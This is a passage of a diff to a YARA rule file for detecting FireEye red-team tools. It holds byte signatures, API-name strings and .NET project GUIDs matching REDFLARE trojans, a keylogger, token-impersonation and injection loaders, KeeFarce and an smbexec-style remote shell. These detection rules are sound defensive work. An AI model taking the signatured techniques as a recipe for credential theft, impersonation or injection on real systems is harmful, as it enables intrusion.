+		$s0 = { 89 [1-16] FF 15 [4-16] 89 [1-24] E8 [4-16] 89 C6 [4-24] 8D [1-8] 89 [1-4] 89 [1-4] E8 [4-16] 89 [1-8] E8 [4-24] 01 00 00 00 [1-8] 89 [1-8] E8 [4-64] 8A [1-8] 88 }
+		$s2 = { 83 EC [4-24] 00 10 00 00 [4-24] C7 44 24 ?? ?? 00 00 00 [0-8] FF 15 [4-24] 89 [1-4] 89 [1-4] 89 [1-8] FF 15 [4-16] 3? ?? 7? [4-24] 20 00 00 00 [4-24] FF 15 [4-32] F3 A5 }
+		$si1 = "fread" fullword
+		$si2 = "fwrite" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_8 : FILE
+rule FIREEYE_RT_Trojan_Raw_Generic_4 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "b090df60-8f4e-51ca-944c-6f9ce2d9c913"
+		id = "9092f9bb-cab6-55c0-9452-70a6407db93a"
 		date = "2020-12-02"
 		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_8.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Trojan_Raw_Generic_4.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "9c8eb908b8c1cda46e844c24f65d9370, 9e85713d615bda23785faf660c1b872c"
-		logic_hash = "5b8a0402886daebefb995e7df0877d51727c5b8dc58eeb8ff16ceec5e7811a20"
+		hash = "f41074be5b423afb02a74bc74222e35d"
+		logic_hash = "8ffd23631c1a9d1abe6695858ec34d61261b3b3f097be94372f3f34e46e7211e"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$1 = "PSRunner.PSRunner" fullword
-		$2 = "CorBindToRuntime" fullword
-		$3 = "ReportEventW" fullword
-		$4 = "InvokePS" fullword wide
-		$5 = "runCommand" fullword
-		$6 = "initialize" fullword
-		$trap = { 03 40 00 80 E8 [4] CC }
+		$s0 = { 83 ?? 02 [1-16] 40 [1-16] F3 A4 [1-16] 40 [1-16] E8 [4-32] FF ( D? | 5? | 1? ) }
+		$s1 = { 0F B? [1-16] 4D 5A [1-32] 3C [16-64] 50 45 [8-32] C3 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) != 0x5A4D and all of them
 }
-rule FIREEYE_RT_APT_Controller_Linux_REDFLARE_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Keefarce_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'KeeFarce' project."
 		author = "FireEye"
-		id = "79a69740-7209-5c56-ad6f-eb4d0b29beaf"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "c17add0c-e09f-5ced-a4e1-bf60afad4725"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Controller_Linux_REDFLARE_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/KEEFARCE/production/yara/HackTool_MSIL_KeeFarce_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "79259451ff47b864d71fb3f94b1774f3, 82773afa0860d668d7fe40e3f22b0f3e"
-		logic_hash = "d6b0cc5f386da9bff8a8293f2b3857406044ab42f7c1bb23d5096052a3c42ce4"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "8db86230849137608880dbe448737fc70068d308772e294cc69301b18ae10908"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$1 = "/RedFlare/gorat_server"
-		$2 = "RedFlare/sandals"
-		$3 = "goratsvr.CommandResponse" fullword
-		$4 = "goratsvr.CommandRequest" fullword
+		$typelibguid0 = "17589ea6-fcc9-44bb-92ad-d5b3eea6af03" ascii nocase wide
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_3 : FILE
+rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_2 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "2f6785c4-f4d0-52ff-8c46-da953e2ca92a"
-		date = "2020-12-01"
-		date = "2020-12-01"
-		modified = "2020-12-09"
+		id = "b10b476a-0d38-53e4-80cf-559618729268"
+		date = "2020-12-18"
+		modified = "2020-12-18"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_3.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_2.yar#L5-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "9ccda4d7511009d5572ef2f8597fba4e,ece07daca53dd0a7c23dacabf50f56f1"
-		logic_hash = "ee104bc145686a134e4d6d620dae7d1dacff7645d47f1a8d7a212327352b8e87"
+		logic_hash = "5a2e0559e3b47c1957a42929fbbeba7a53c21619125381b01dcd8453b6ec4802"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
 
 	strings:
-		$calc_image_size = { 28 00 00 00 [2-30] 83 E2 1F [4-20] C1 F8 05 [0-8] 0F AF C? [0-30] C1 E0 02 }
-		$str1 = "CreateCompatibleBitmap" fullword
-		$str2 = "BitBlt" fullword
-		$str3 = "runCommand" fullword
+		$1 = "DueDLLigence" fullword
+		$2 = "CPlApplet" fullword
+		$iz1 = /_Cor(Exe|Dll)Main/ fullword
 
 	condition:
 		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_5 : FILE
+rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "892981d6-f310-5ee8-95b5-dd4bd720a86c"
-		date = "2020-12-01"
-		date = "2020-12-01"
-		modified = "2020-12-09"
+		id = "d438575f-3cb2-5cff-b5d4-733044f62e61"
+		date = "2020-12-18"
+		modified = "2020-12-18"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_5.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_1.yar#L5-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dfbb1b988c239ade4c23856e42d4127b, 3322fba40c4de7e3de0fda1123b0bf5d"
-		logic_hash = "ab38e5ebded026829672941709797b40f8e13fb244b6a8ed3545de4358f727b8"
+		logic_hash = "56237d686b954950849adeedc87d5f9fbff2335a0ff033ba8571b3e3b93f587c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 3
 
 	strings:
-		$s1 = "AdjustTokenPrivileges" fullword
-		$s2 = "LookupPrivilegeValueW" fullword
-		$s3 = "ImpersonateLoggedOnUser" fullword
-		$s4 = "runCommand" fullword
-		$steal_token = { FF 15 [4] 85 C0 [1-40] C7 44 24 ?? 01 00 00 00 [0-20] C7 44 24 ?? 02 00 00 00 [0-20] FF 15 [4] FF [1-5] 85 C0 [4-40] 00 04 00 00 FF 15 [4-5] 85 C0 [2-20] ( BA 0F 00 00 00 | 6A 0F ) [1-4] FF 15 [4] 85 C0 74 [1-20] FF 15 [4] 85 C0 74 [1-20] ( 6A 0B | B9 0B 00 00 00 ) E8 }
+		$create_thread_injected = { 7E [2] 00 0A 0A 16 0B 16 8D [2] 00 01 0C 28 [2] 00 06 2? ?? 2A 28 [2] 00 0A 1E 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 7E [2] 00 0A 08 8E 69 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 0D 09 7E [2] 00 0A 28 [2] 00 0A }
+		$iz1 = /_Cor(Exe|Dll)Main/ fullword
+		$suspended_process = { 12 ?? FE 15 [2] 00 02 1? ?? FE 15 [2] 00 02 02 14 7E [2] 00 0A 7E [2] 00 0A 16 20 [2] 00 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 }
 
 	condition:
 		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Keylogger_Win64_REDFLARE_1 : FILE
+rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_3 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "3c980f5a-c775-5c25-ba28-91a93a1b9a85"
-		date = "2020-12-01"
-		date = "2020-12-01"
-		modified = "2020-12-09"
+		id = "42e4e777-6d51-5733-97df-dc27f13a27b7"
+		date = "2020-12-18"
+		modified = "2020-12-18"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Keylogger_Win64_REDFLARE_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_3.yar#L5-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "fbefb4074f1672a3c29c1a47595ea261"
-		logic_hash = "26fe577ba637c484d9a8ccc2173b5892a76328a90a39a2bebbae6bd2a6329485"
+		logic_hash = "41cc6a4c7765b1e5e88d12660b69e434c83938ca974b9ccf6545b4dd5dd78378"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
 
 	strings:
-		$create_window = { 41 B9 00 00 CF 00 [4-40] 33 C9 [2-10] 00 00 00 80 [2-10] 00 00 00 80 [2-10] 00 00 00 80 [2-10] 00 00 00 80 FF 15 }
-		$keys_check = { B9 14 00 00 00 FF 15 [4-8] B9 10 00 00 00 FF 15 [4] BE 00 80 FF FF 66 85 C6 75 ?? B9 A0 00 00 00 FF 15 [4] 66 85 C6 75 ?? B9 A1 00 00 00 FF 15 [4] 66 85 C6 74 }
+		$create_thread_injected = { 7E [2] 00 0A 0A 16 0B 16 8D [2] 00 01 0C 28 [2] 00 06 2? ?? 2A 28 [2] 00 0A 1E 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 7E [2] 00 0A 08 8E 69 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 0D 09 7E [2] 00 0A 28 [2] 00 0A }
+		$iz1 = /_Cor(Exe|Dll)Main/ fullword
+		$rc4 = { 20 00 01 00 00 8D [2] 00 01 1? ?? 20 00 01 00 00 8D [2] 00 01 1? ?? 03 8E 69 8D [2] 00 01 1? ?? 16 0B 2B ?? 1? ?? 07 02 07 02 8E 69 5D 91 9E 1? ?? 07 07 9E 07 17 58 0B 07 20 00 01 00 00 32 }
+		$suspended_process = { 12 ?? FE 15 [2] 00 02 1? ?? FE 15 [2] 00 02 02 14 7E [2] 00 0A 7E [2] 00 0A 16 20 [2] 00 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Builder_PY_REDFLARE_1
+rule FIREEYE_RT_Hacktool_MSIL_HOLSTER_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the a customized version of the 'DUEDLLIGENCE' project."
 		author = "FireEye"
-		id = "3b5ad25d-ce66-572e-9a91-40a73b8fd447"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "e1e8979e-2dee-5061-a11d-00dcfba476c3"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Builder_PY_REDFLARE_1.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/HackTool_MSIL_HOLSTER_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "d0a830403e56ebaa4bfbe87dbfdee44f"
-		logic_hash = "1948cadb7242eb69bffbc222802ce9c1af38d7a846da09b6343b1449fe054e42"
+		hash = "a91bf61cc18705be2288a0f6f125068f"
+		logic_hash = "bc254a1ab71f2a6092f139ce5a85347a7a4976f963603ffbbebb9b0d6ce6573c"
 		score = 75
-		quality = 75
-		tags = ""
-		rev = 1
+		quality = 73
+		tags = "FILE"
+		rev = 2
 
 	strings:
-		$1 = "LOAD_OFFSET_32 = 0x612"
-		$2 = "LOAD_OFFSET_64 = 0x611"
-		$3 = "class RC4:"
-		$4 = "struct.pack('<Q' if is64b else '<L'"
-		$5 = "stagerConfig['comms']['config']"
-		$6 = "_x86.dll"
-		$7 = "_x64.dll"
+		$typelibguid1 = "a8bdbba4-7291-49d1-9a1b-372de45a9d88" ascii nocase wide
 
 	condition:
-		all of them and @1 [ 1 ] < @2 [ 1 ] and @2 [ 1 ] < @3 [ 1 ] and @3 [ 1 ] < @4 [ 1 ] and @4 [ 1 ] < @5 [ 1 ]
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_4 : FILE
+rule FIREEYE_RT_MSIL_Launcher_DUEDLLIGENCE_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'DUEDLLIGENCE' project."
 		author = "FireEye"
-		id = "6e8621b0-a0ee-5fc7-a2b8-1973a42d6e37"
-		date = "2020-12-01"
-		date = "2020-12-01"
+		id = "86f0ebe5-110b-53e2-bba5-676f00c2cddd"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_4.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/MSIL_Launcher_DUEDLLIGENCE_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "a8b5dcfea5e87bf0e95176daa243943d, 9dcb6424662941d746576e62712220aa"
-		logic_hash = "d027e98ad8fa6d03a49ceffd81fba6a621173e2dbabae652bee2f4e8489bb378"
+		hash = "a91bf61cc18705be2288a0f6f125068f"
+		logic_hash = "bd6abaa909f0c776d81ed1115e875888336661c91df3881f4f3ea5dd27e115f8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$s1 = "LogonUserW" fullword
-		$s2 = "ImpersonateLoggedOnUser" fullword
-		$s3 = "runCommand" fullword
-		$user_logon = { 22 02 00 00 [1-10] 02 02 00 00 [0-4] E8 [4-40] ( 09 00 00 00 [1-10] 03 00 00 00 | 6A 03 6A 09 ) [4-30] FF 15 [4] 85 C0 7? }
+		$typelibguid0 = "73948912-cebd-48ed-85e2-85fcd1d4f560" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Downloader_Win32_REDFLARE_1 : FILE
+rule FIREEYE_RT_Tool_MSIL_Sharpgrep_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpGrep' project."
 		author = "FireEye"
-		id = "e8d7ee31-568e-58ac-98ad-49baa2eb37ea"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "c7569d33-f57d-5f9c-aa2a-78866c680b5b"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Downloader_Win32_REDFLARE_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPPGREP/production/yara/Tool_MSIL_SharpGrep_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "05b99d438dac63a5a993cea37c036673"
-		logic_hash = "a340a2a732a9b1aa74ca9d84009a88d1b14b6a03140a859384c0d6e745e4a90a"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "c22bfc50b3ab3c4082006aad3c3c89684cffe1e429b001b0bb08758856a47d04"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$const = "Cookie: SID1=%s" fullword
-		$http_req = { 00 00 08 80 81 3D [4] BB 01 00 00 75 [1-10] 00 00 80 00 [1-4] 00 10 00 00 [1-4] 00 20 00 00 89 [1-10] 6A 00 8B [1-8] 5? 6A 00 6A 00 6A 00 8B [1-8] 5? 68 [4] 8B [1-8] 5? FF 15 [4-40] 6A 14 E8 }
+		$typelibguid0 = "f65d75b5-a2a6-488f-b745-e67fc075f445" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_REDFLARE_2 : FILE
+rule FIREEYE_RT_Loader_MSIL_Wmirunner_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMIRunner' project."
 		author = "FireEye"
-		id = "6a585401-bfd3-5aad-b484-09b6a30d9af5"
-		date = "2020-11-27"
-		date = "2020-11-27"
+		id = "04c6acfc-859f-5e4a-8c59-9adf08f21657"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win32_REDFLARE_2.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMIRUNNER/production/yara/Loader_MSIL_WMIRunner_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4e7e90c7147ee8aa01275894734f4492"
-		logic_hash = "98dfb71adbde4f8965e612c19f0965d8fa95805825569290fdf72eb1d86cfb70"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "49d21756a4f0b29909c4b0fa9f3a98dd0480f9401923032de4b3920814b85f29"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$inject = { 83 F8 01 [4-50] 6A 00 6A 00 68 04 00 00 08 6A 00 6A 00 6A 00 6A 00 5? [10-70] FF 15 [4] 85 C0 [1-20] 6A 04 68 00 10 00 00 5? 6A 00 5? [1-10] FF 15 [4-8] 85 C0 [1-20] 5? 5? 5? 8B [1-4] 5? 5? FF 15 [4] 85 C0 [1-20] 6A 20 [4-20] FF 15 [4] 85 C0 [1-40] 01 00 01 00 [2-20] FF 15 [4] 85 C0 [1-30] FF 15 [4] 85 C0 [1-20] FF 15 [4] 83 F8 FF }
-		$s1 = "ResumeThread"
+		$typelibguid0 = "6cc61995-9fd5-4649-b3cc-6f001d60ceda" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Trojan_Linux_REDFLARE_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Prepshellcode_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'PrepShellcode' project."
 		author = "FireEye"
-		id = "220302bc-4ed3-5e10-9bd2-a8ed2bdaef73"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "32fb6b1d-e01f-5555-8516-088dca2166cf"
+		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/supplemental/yara/APT_Trojan_Linux_REDFLARE_1.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PREPSHELLCODE/production/yara/HackTool_MSIL_PrepShellcode_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "79259451ff47b864d71fb3f94b1774f3, 82773afa0860d668d7fe40e3f22b0f3e"
-		logic_hash = "282f11c4c86d88d05f11e92f5483701d9a54c2dd39f21316cd271aa78a338d0f"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "aedae87d84275f6589c982c04175ddc0aee3e4f3ae959ced4b4e2294675522e6"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$s1 = "find_applet_by_name" fullword
-		$s2 = "bb_basename" fullword
-		$s3 = "hk_printf_chk" fullword
-		$s4 = "runCommand" fullword
-		$s5 = "initialize" fullword
+		$typelibguid0 = "d16ed275-70d5-4ae5-8ce7-d249f967616c" ascii nocase wide
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_6 : FILE
+rule FIREEYE_RT_Hacktool_PY_Impacketobfuscation_1
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "smbexec"
 		author = "FireEye"
-		id = "5875a9ec-c3ee-57f0-a430-4443db585def"
+		id = "992d1132-3136-5e1b-a1ef-dcdf36ebf0f5"
 		date = "2020-12-01"
 		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/supplemental/yara/APT_Trojan_Win_REDFLARE_6.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/IMPACKETOBF (Smbexec)/production/yara/HackTool_PY_ImpacketObfuscation_1.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "294b1e229c3b1efce29b162e7b3be0ab, 6902862bd81da402e7ac70856afbe6a2"
-		logic_hash = "1e6f8320e0c0b601fc72fa4d9c61e46adfbcd84638c97da5988ca848e036312a"
+		hash = "0b1e512afe24c31531d6db6b47bac8ee"
+		logic_hash = "45a4c0426b29b8c8bede9c4e8292131da7e756d48fc3ac4a07d08fd52383d21e"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		rev = 2
+		quality = 50
+		tags = ""
+		rev = 1
 
 	strings:
-		$s1 = "RevertToSelf" fullword
-		$s2 = "Unsuccessful" fullword
-		$s3 = "Successful" fullword
-		$s4 = "runCommand" fullword
-		$s5 = "initialize" fullword
+		$s1 = "class CMDEXEC" nocase
+		$s2 = "class RemoteShell" nocase
+		$s3 = "self.services_names"
+		$s4 = "import random"
+		$s6 = /self\.__shell[\x09\x20]{0,32}=[\x09\x20]{0,32}[\x22\x27]%CoMSpEC%[\x09\x20]{1,32}\/q[\x09\x20]{1,32}\/K [\x22\x27]/ nocase
+		$s7 = /self\.__serviceName[\x09\x20]{0,32}=[\x09\x20]{0,32}self\.services_names\[random\.randint\([\x09\x20]{0,32}0[\x09\x20]{0,32},[\x09\x20]{0,32}len\(self\.services_names\)[\x09\x20]{0,32}-[\x09\x20]{0,32}1\)\]/
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_INVEIGHZERO_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_GETDOMAINPASSWORDPOLICY_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'inveighzero' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the recon utility 'getdomainpasswordpolicy' project."
 		author = "FireEye"
-		id = "f46fe365-ea50-5597-828e-61a7225e4c6e"
